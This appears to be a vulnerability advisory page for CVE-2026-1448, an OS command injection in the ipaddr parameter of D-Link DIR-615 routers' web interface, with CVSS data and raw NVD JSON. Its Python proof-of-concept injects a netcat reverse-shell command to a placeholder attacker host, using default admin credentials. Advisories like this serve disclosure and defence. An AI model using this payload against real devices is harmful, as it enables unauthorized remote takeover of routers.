Security Vulnerability Report
CVE-2026-1448 CVSS 7.2 HIGH

Published: 2026-01-27 00:15:51
Last Modified: 2026-01-28 16:37:26

Description

A vulnerability was detected in D-Link DIR-615 up to 4.10. This impacts an unknown function of the file /wiz_policy_3_machine.php of the component Web Management Interface. Performing a manipulation of the argument ipaddr results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-615_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-615 firmware <= 4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-1448 PoC - D-Link DIR-615 OS Command Injection
# Target: D-Link DIR-615 up to firmware 4.10
# File: /wiz_policy_3_machine.php
# Parameter: ipaddr

target_ip = "192.168.0.1"  # Router IP
target_url = f"http://{target_ip}/wiz_policy_3_machine.php"

# Login first to get valid session
login_url = f"http://{target_ip}/login.php"
login_data = {
    "username": "admin",
    "password": "admin"
}

session = requests.Session()
# session.post(login_url, data=login_data)

# Exploit: OS Command Injection via ipaddr parameter
# Example: Inject command to create reverse shell
payload = "; nc -e /bin/sh attacker_ip 4444;"

params = {
    "ipaddr": payload,
    "action": "save"
}

# Send malicious request
response = session.get(target_url, params=params)
print(f"Status: {response.status_code}")
print(f"Response: {response.text[:500]}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1448", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:50.573", "lastModified": "2026-01-28T16:37:25.937", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-615 up to 4.10. This impacts an unknown function of the file /wiz_policy_3_machine.php of the component Web Management Interface. Performing a manipulation of the argument ipaddr results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en D-Link DIR-615 hasta la versión 4.10. Esto afecta a una función desconocida del archivo /wiz_policy_3_machine.PHP del componente Interfaz de Gestión Web. Realizar una manipulación del argumento ipaddr resulta en inyección de comandos. Es posible iniciar el ataque de forma remota. El exploit ya es público y puede ser utilizado. 
Esta vulnerabilidad solo afecta a productos que ya no cuentan con soporte por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-615_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.10", "matchCriteriaId": "E28848DF-B57F-4335-941E-E6C50A9E74B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:*", "matchCriteriaId": "2E92E959-C211-4979-A233-163BEFCF6F0D"}]}]}], "references": [{"url": "https://pentagonal-time-3a7.notion.site/DIR-615-v4-10-2e7e5dd4c5a580a5aac5c8ce35933396?pvs=73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.342880", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.342880", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.c ... (truncated)